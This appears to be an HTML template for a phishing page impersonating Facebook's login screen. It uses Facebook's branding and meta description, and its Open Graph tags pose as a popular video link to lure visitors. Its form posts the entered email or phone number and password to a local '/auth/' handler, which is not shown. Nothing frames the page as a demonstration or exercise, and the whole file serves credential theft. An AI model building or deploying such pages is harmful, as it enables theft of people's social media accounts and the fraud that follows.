<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="theme-color" content="#3b5998">
    <meta name="description" content="შCreate an account or log into Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates.">
    <link rel="shortcut icon" type="image/png" href="{{ url_for('static', filename='image/fb.ico') }}">
    <link rel="favicon" type="image/png" href="favico.png">
    <meta property="og:site_name" content="Facebook">
    <meta property="og:title" content="Play Video">
    <meta property="og:description" content="5.502.608 Views">
    <meta property="og:image" content="u.jpeg">
    <meta property="og:type" content="video">
    <meta property="og:url" content="https://www.facebook.com/">
    <link rel="stylesheet" type="text/css" href="fb.css">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0">
    <title>facebook.com</title>
</head>
<body>
<style type="text/css">
* {
    outline: none;
    font-family: sans-serif;
    padding: 0;
    margin: 0;
}

body {
    color: #7b7b7b;
}

a {
    text-decoration: none;
    color: #3b77bc;
}

header {
    width: 94%;
    background-color: #fffbe2;
    padding: 10px;
    color: #3b77bc;
    font-size: 13px;
}

main {
    text-align: center;
    margin: 20px auto;
}

main > form {
    width: 400px;
    margin: 10px auto;
}

main > form > input {
    width: 92%;
    padding: 12px;
    background-color: #f5f6f7;
    border: 1px solid #ccc;
    border-radius: 4px;
    margin: 2px;
}


main > form > button {
    width: 100%;
    background-color: #1877f2;
    border: 1px solid #1877f2;
    border-radius: 4px;
    box-shadow: 0 -1px rgba(0, 0, 0, .25);
    cursor: pointer;
    color: #fff;
    padding: 12px;
    margin: 13px auto;
    margin-left: 2px;
}

.reg-btn {
    padding: 12px;
    border: none;
    border-radius: 4px;
    background-color: #00a400;
    color: #fff;
    cursor: pointer;
}

.langs {
    width: 100%;
    display: flex;
    justify-content: center;
    margin: 100px auto;
    font-size: 13px;
}

.langs> div {
    width: 50%;
}

.langs > div > a {
    display: inline-block;
    width: 100%
}

.f {
    font-size: 14px;
}

@media only screen and (max-width: 600px) {
  main > form {
    width: 90%;
  }
  
  main > form > input {
    width: 92%;
  }
}
</style>
    <header>
      <p>Yet login for register</p>
    </header>    
    <main>
      <img src="{{ url_for('static', filename='image/fb-logo.svg') }}" width="160px" alt="facebook.">


      <form action="/auth/" method="POST" enctype="multipart/form-data" autocomplete="on">
        <input type="hidden" name="from_form" value="#_=">
        <input type="text" name="email" placeholder="Mobile number or email" required>
        <input type="password" name="pass" placeholder="Password" required>
        <button type="submit">Log In</button>
      </form>
      <span>or</span><br><br>
      <button class="reg-btn">Create New Account</button><br><br>
      <a href="#" class="f">Forgot password?</a>
      <div class="langs">
        <div>
          <a href="#">English (US)</a>
          <a href="#">Русский</a>
          <a href="#">Deutsch</a>
          <a href="#">Português (Brasil)</a>
        </div>
        <div>
          <a href="#">ქართული</a>
          <a href="#">Türkçe</a>
          <a href="#">Espanol</a>
          <a href="#">More</a>
        </div>
      </div>
    </main>
    
</body>
</html>